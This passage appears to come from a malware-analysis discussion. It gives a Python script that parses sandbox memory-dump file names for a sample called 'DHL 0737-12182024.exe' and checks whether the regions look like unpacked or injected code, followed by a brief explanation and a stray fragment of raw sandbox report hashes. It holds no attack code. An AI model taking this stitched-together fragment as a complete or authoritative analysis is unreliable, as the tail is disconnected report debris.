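    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Win32 region types as reported in MEMORY_BASIC_INFORMATION.Type.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)

# Copied from the report listing above (process 0, the DHL 0737-12182024.exe image).
REPORT_SOURCES = [
    "00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    base: int
    protect: str
    mem_type: str
    dump_id: int


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp name into a DumpRegion; raises ValueError on a mismatch."""
    m = _SDMP.match(name.strip())
    if not m:
        raise ValueError(f"not an .sdmp source name: {name!r}")
    g = m.groupdict()
    protect = int(g["protect"], 16)
    mtype = int(g["mtype"], 16)
    return DumpRegion(
        base=int(g["base"], 16),
        protect=PAGE_PROTECT.get(protect, f"UNKNOWN(0x{protect:x})"),
        mem_type=MEM_TYPE.get(mtype, f"UNKNOWN(0x{mtype:x})"),
        dump_id=int(g["dump_id"]),
    )


def check_image_layout(names, image_base: int):
    """Return (ok, findings).

    ok is True when every region is MEM_IMAGE, sits at or above image_base,
    nothing is RWX, and exactly one region is executable (the code section).
    Each violated expectation becomes a human-readable finding; a RWX or
    non-image region is the usual sign of unpacked or injected code rather
    than of the on-disk PE the report says these dumps are based on.
    """
    regions = [parse_sdmp(n) for n in names]
    findings = []
    for r in regions:
        if r.mem_type != "MEM_IMAGE":
            findings.append(f"0x{r.base:x}: not an image mapping ({r.mem_type})")
        if r.base < image_base:
            findings.append(f"0x{r.base:x}: below image base 0x{image_base:x}")
        if r.protect == "PAGE_EXECUTE_READWRITE":
            findings.append(f"0x{r.base:x}: RWX region (unpacked/injected code?)")
    executable = [r for r in regions if "EXECUTE" in r.protect]
    if len(executable) != 1:
        findings.append(f"{len(executable)} executable regions (expected 1 code section)")
    return (not findings), findings


if __name__ == "__main__":
    for src in REPORT_SOURCES:
        r = parse_sdmp(src)
        print(f"0x{r.base:08x}  {r.protect:<22} {r.mem_type}")
    ok, findings = check_image_layout(REPORT_SOURCES, image_base=0x820000)
    print("layout consistent with a mapped PE image:", ok, findings)
```

Run as-is it prints the six regions and reports the layout as consistent: one PAGE_EXECUTE_READ region at 0x821000, read-only regions for the header and data sections, one writable region, all of type MEM_IMAGE at or above the report's stated offset. If the assumed field layout is wrong for some other report version the parser raises rather than guessing, which is the behaviour you want from a check that feeds a verdict.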
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1717984340-0
                                                                                            • Opcode ID: e57527599d0df0760ed90ed7262210d8a6d8a99735ba989fae5ea852463e4d53
                                                                                            • Instruction ID: 65b62f49b95b8bd6952023ff24254be5dbbce39a005a691a67ddc6c39acf0f25
                                                                                            • Opcode Fuzzy Hash: e57527599d0df0760ed90ed7262210d8a6d8a99735ba989fae5ea852463e4d53
                                                                                            • Instruction Fuzzy Hash: 0B41D43460021AAFCF218FA9CC45ABABBA5FF61312F144169FD59D71A1DF308D09CB61
